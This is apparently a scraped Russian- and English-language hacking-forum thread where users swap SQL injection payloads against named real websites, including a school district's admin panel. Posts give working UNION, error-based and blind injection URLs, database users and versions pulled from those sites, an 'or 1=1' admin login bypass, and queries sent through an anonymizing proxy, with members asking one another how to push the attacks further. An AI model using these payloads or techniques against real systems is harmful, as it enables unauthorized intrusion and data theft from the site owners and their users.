http://www.oz-gorod.ru/auto_ads.php?aid=-3+unioN+seleCt+1 Ошибка исчезает. Сейчас через ошибку попробую. -- BigBear, true. Blind =/
Это Blind-SQL Обрати внимание на текст под формой Code: http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)=5 TRUE http://www.oz-gorod.ru/auto_ads.php?aid=3+and+substring((@@version),1,1)=4 FASLE User: us2864h@localhost Database: db2864h Version: 5.1.57
http://www.kingston.k12.ok.us/index.php?pageID=3675_2'+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+ http://www.kingston.k12.ok.us/admin/ обход авторизации в админке login : admin' or '1'='1 pass: pass' or '1'='1
а вопрос насчот and+substring((@@version),1,1)=5 TRUE че ето за новый вид разкрютки? где я могу почитать мунал?
Code: http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39 Code: http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317 Cannot get order by.. Any help please?
Code: http://www.ozchristmaslightsales.com.au/shopping/pgm-more_information.php?id=-39'+/*!union*/+select+0,1,2,3,4,5,6,version(),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1--+f user():ozchrist_sope1@localhost version():5.1.56 database():ozchrist_sope1 Code: http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+group+by+99999999999--+f TRUE http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=317+group+by+1--+f TRUE I think, this is blind injection...
лол. там не блинд. Code: http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317.1111%27+/*!unION*/+select+1,2,3,4,concat_ws%280x3b,database%28%29,user%28%29,version%28%29%29,6,7,8,9,0,11,12,13+--+ При вытаскивании инфы из таблиц, обрамляйте в апострофы имя базы. Code: http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317.1111%27+/*!unION*/+select+1,2,3,4,table_name,6,7,8,9,0,11,12,13+fRom+%60information_schema%60.tables+--+
Code: http://www.yosoytalento.com/prueba3/proyectosespeciales.php?idproyectosespecial=-317 Cannot get order by.. Any help please?[/QUOTE]
Изучаю такую технологию как buffer overflow и постепенно погружаюсь в кернел хакинг, вопрос: на каком *никс дистрибутиве мне будит удобно писать ядерньки? =\ Остановился на выборе между gentoo & debian .
а как тут? PHP: http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.user--+ выводит ошибку PHP: http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.donaticus-him.ru/view_product.php?id=-4%27+union+select+1,2,3,4,file_priv+from+mysql.user+where+user=%27u198287@87%27--+ и так тоже ошибка
Подскажите<а то не разу не встречал такой подход http://site/login_login_groovy/' выдает 1. DB Error: syntax error Code: 1064 Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' AND ssa.user_group_id IN (0)' a SQL: SELECT ss.id, ss.parent_id, ss.alias, ss.path, ss.c_img, ssd.name FROM sites_structure ss, sites_structure_desc ssd, sites_structure_access ssa WHERE ss.site_id='1' AND ssd.section_id=ss.id AND ssd.lang_id='1' AND ssa.section_id=ss.id AND ss.alias = ''' AND ssa.user_group_id IN (0) не пойму как раскручивать такой параметр
